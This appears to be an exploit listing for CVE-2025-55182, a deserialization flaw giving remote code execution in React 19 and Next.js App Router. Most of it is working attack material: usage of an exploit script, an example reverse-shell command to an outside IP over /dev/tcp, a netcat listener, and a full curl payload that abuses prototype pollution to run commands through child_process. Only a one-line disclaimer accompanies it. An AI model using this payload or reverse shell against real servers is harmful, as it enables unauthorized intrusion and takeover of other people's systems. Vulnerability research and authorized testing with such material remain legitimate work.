## https://sploitus.com/exploit?id=C1F789DD-22F6-55CE-972A-C3B3E0305BF4
## CVE-2025-55182 Unsafe Deserialization - RCE
```
React 19.0.0, 19.1.0, 19.1.1, 19.2.0 / Next.js 15.x (with App Router), 16.0.0 - 16.0.6
```
This is a very minimal exploit script for the React2Shell vulnerability
(CVE-2025-55182). It prepares and sends a crafted multipart/form-data POST request
to a vulnerable React application to achieve remote code execution.
```bash
# Usage:
python3 react2shell_exploit.py
# Example:
python3 react2shell_exploit.py http://10.87.161.17:8080 'bash -i >& /dev/tcp/10.111.0.193/4444 0>&1' OR 'ls -la >&2 && exit 1'
```
The command you provide will be executed on the target server.
```
For reverse shells, ensure you have a listener set up on your local machine
before executing the exploit.
eg. `nc -lvnp 4444`
```
Disclaimer: Use this script only on systems you own
or have explicit permission to test. Unauthorized
access to computer systems is illegal and unethical.
```bash
# data format
0:{"id":1,"data":"value"}
1:{"ref":"$@0"}
```
```bash
# rce whoami
curl -X POST http://10.87.161.17:8080 -H "Next-Action: x" -H "Content-Type: multipart/form-data; boundary=----X" --data-binary $'------X\r\nContent-Disposition: form-data; name="0"\r\n\r\n{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\\"then\\":\\"$B1337\\"}","_response": {"_prefix":"process.mainModule.require(\'child_process\').execSync(\'whoami >&2 && exit 1\');","_formData": {"get":"$1:constructor:constructor"}}}\r\n------X\r\nContent-Disposition: form-data; name="1"\r\n\r\n"$@0"\r\n------X--\r\n'
```